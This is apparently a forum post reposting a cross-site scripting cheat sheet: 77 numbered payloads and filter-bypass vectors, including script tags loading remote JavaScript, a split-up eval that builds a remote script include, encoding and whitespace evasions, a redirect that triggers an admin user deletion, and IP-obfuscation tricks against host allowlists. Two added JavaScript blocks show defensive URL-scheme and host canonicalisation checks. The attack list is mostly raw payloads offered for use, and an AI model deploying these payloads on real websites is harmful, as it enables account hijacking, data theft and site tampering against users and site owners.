12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267

It seems there isn't much XSS material on t00ls, so I've copied over something good I came across; not sure whether any of you want to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab to split the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab to split the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Multi-line embedded JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Getting around a character limit (all on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2. Null characters are basically useless in China, since there is nowhere to exploit them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC="   javascript:alert('XSS');">
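Items 4 to 19 are all the same scheme spelled differently, which is why a blocklist that string-matches "javascript:" loses. The defensive counterpart is an allowlist check that first applies the browser's own tolerance (numeric entity decoding, stripping of tab/LF/CR, trimming of leading controls) and then lets the platform URL parser decide the scheme. The block below is an added example, not code from the original post or from the cheat sheet it copies; the base origin https://example.invalid/ and the sample inputs are constructed for the demonstration.

```javascript
// Added example (not from the original post): allowlist validation of a value that
// is about to be emitted in an href/src attribute. The normalisation mirrors what a
// browser does before it reads the scheme, so the case, whitespace and entity
// variants of "javascript:" listed in items 4-19 are all rejected the same way.

const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]);

// Decode numeric character references (&#106; &#0000106 &#x6A;), with or without
// the trailing semicolon, as an HTML parser does when it reads an attribute value.
function decodeNumericEntities(s) {
  const toChar = (cp) => (cp > 0x10ffff ? "\uFFFD" : String.fromCodePoint(cp));
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, hex) => toChar(parseInt(hex, 16)))
    .replace(/&#([0-9]+);?/g, (_, dec) => toChar(parseInt(dec, 10)));
}

// The URL parser drops ASCII tab, LF and CR anywhere in its input and trims
// leading/trailing C0 controls and spaces, so "jav\tascript:" and "  javascript:"
// both read as "javascript:". Apply the same steps before looking at the scheme.
function browserNormalize(value) {
  let v = decodeNumericEntities(String(value));
  v = v.replace(/[\t\n\r]/g, "");
  v = v.replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, "");
  return v;
}

// Returns the canonical URL to emit, or null when the value must be dropped.
// `base` is a constructed placeholder standing in for the site's own origin.
function safeUrlAttribute(value, base = "https://example.invalid/") {
  const normalized = browserNormalize(value);
  // Anything that still carries a control character (e.g. an embedded NUL as in
  // items 17-18) is rejected outright rather than passed on to the parser.
  if (/[\x00-\x1f\x7f]/.test(normalized)) return null;
  let url;
  try {
    url = new URL(normalized, base); // same parser the browser uses, not a regex
  } catch {
    return null; // unparseable: never emit it
  }
  return ALLOWED_SCHEMES.has(url.protocol) ? url.href : null;
}

// Constructed sample inputs shaped like the vectors above: rejected values map to
// null, accepted ones come back in canonical form.
const SAMPLES = [
  "javascript:alert('XSS')",
  "JaVaScRiPt:alert('XSS')",
  "jav\tascript:alert('XSS');",
  "jav\nascript:alert('XSS');",
  "   javascript:alert('XSS');",
  "&#106;avascript:alert('XSS')",
  "&#0000106avascript:alert('XSS')",
  "&#x6A;avascript:alert('XSS')",
  "java\0script:alert('XSS')",
  "vbscript:msgbox(\"XSS\")",
  "http://3w.org/XSS/xss.js",
  "//3w.org/XSS/xss.js",
  "/account/settings",
];

for (const s of SAMPLES) {
  console.log(JSON.stringify(s).padEnd(40), "->", safeUrlAttribute(s));
}
```

The check decides only whether the URL value is acceptable; the accepted string still has to be attribute-escaped when it is written into the HTML, and the allowlist should be as narrow as the feature needs (a profile link rarely needs mailto:). Relative values are resolved against the site's own origin so that a protocol-relative "//host/..." (item 25 and item 74 style) cannot pick up a scheme the allowlist never saw.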
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'>
(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous tag with STYLE (an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE approach
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed Flash that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript in Flash to smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace. The .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command, can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) Decimal IP
<A HREF="http://3232235521">XSS</A>
(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Dropping [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Dropping [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute dot for absolute DNS
<A HREF="http://www.google.com./">XSS</A>
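Items 70 to 73 and 76 work against host allowlists that compare raw text: the URL parser accepts a single decimal integer, hex and octal labels, a short form whose last label fills the remaining bytes, and a trailing dot, so one address has many spellings. The block below is an added example and not code from the original post: it re-implements the IPv4 number parsing of the WHATWG URL standard so the reader can see exactly what is being accepted, cross-checks every result against the platform's own `new URL()`, and does the allowlist comparison on canonical forms. All sample hosts are constructed from the shapes shown above.

```javascript
// Added example (not from the original post): canonicalise a host before comparing
// it with an allowlist. Follows the WHATWG URL standard's IPv4 parser, which is why
// the decimal, hex and octal hosts in items 70-72 all come out as 192.168.0.1.

// One dotted label: a "0x" prefix means hex, a leading "0" means octal, otherwise
// decimal. Returns NaN when the label is not a number in the radix it announces.
function parseIPv4Number(part) {
  if (part === "") return NaN;
  let radix = 10;
  if (/^0x/i.test(part)) {
    radix = 16;
    part = part.slice(2);
  } else if (part.length >= 2 && part[0] === "0") {
    radix = 8;
    part = part.slice(1);
  }
  if (part === "") return 0; // "0x" on its own and a lone "0" both mean zero
  const digits = { 8: /^[0-7]+$/, 10: /^[0-9]+$/, 16: /^[0-9a-f]+$/i }[radix];
  return digits.test(part) ? parseInt(part, radix) : NaN;
}

// The parser only treats a host as IPv4 when its last label looks numeric.
function endsInNumber(parts) {
  const last = parts[parts.length - 1];
  return /^[0-9]+$/.test(last) || /^0x[0-9a-f]*$/i.test(last);
}

// Returns dotted-quad text for any accepted numeric form, the lower-cased name for
// a domain, or null for a numeric host the browser would reject (out of range).
function canonicalHost(host) {
  const parts = host.split(".");
  if (parts.length > 1 && parts[parts.length - 1] === "") parts.pop(); // "a.b." form
  if (!endsInNumber(parts)) return host.toLowerCase(); // item 76: the trailing dot stays
  if (parts.length > 4) return null;
  const numbers = parts.map(parseIPv4Number);
  if (numbers.some(Number.isNaN)) return null;
  const head = numbers.slice(0, -1);
  const last = numbers[numbers.length - 1];
  if (head.some((n) => n > 255)) return null;
  if (last >= 256 ** (5 - numbers.length)) return null; // last label fills the rest
  let value = last;
  head.forEach((n, i) => { value += n * 256 ** (3 - i); });
  return [24, 16, 8, 0].map((shift) => Math.floor(value / 2 ** shift) % 256).join(".");
}

// The same question put to the platform parser; null where it refuses the host.
function hostnameViaUrlParser(host) {
  try {
    return new URL("http://" + host + "/").hostname;
  } catch {
    return null;
  }
}

// Allowlist comparison done on canonical forms, never on the raw text.
function sameHost(candidate, allowed) {
  const c = canonicalHost(candidate);
  return c !== null && c === canonicalHost(allowed);
}

// Constructed samples in the shapes used in items 70-72 and 76.
const HOSTS = ["3232235521", "0xc0.0xa8.0x00.0x01", "0300.0250.0000.0001",
               "192.168.1", "256.1.1.1", "www.google.com."];
for (const h of HOSTS) {
  const mine = canonicalHost(h);
  const theirs = hostnameViaUrlParser(h);
  console.log(h.padEnd(22), "->", mine, "| URL():", theirs, mine === theirs ? "(agree)" : "(differ)");
}
```

Note what the canonical form does not do: a trailing dot is kept because the parser keeps it, so "www.google.com." and "www.google.com" remain distinct hosts and an allowlist has to cover the form it actually wants. A numeric host that is out of range is reported as null rather than guessed, matching the parser's refusal to build a URL from it.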
(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14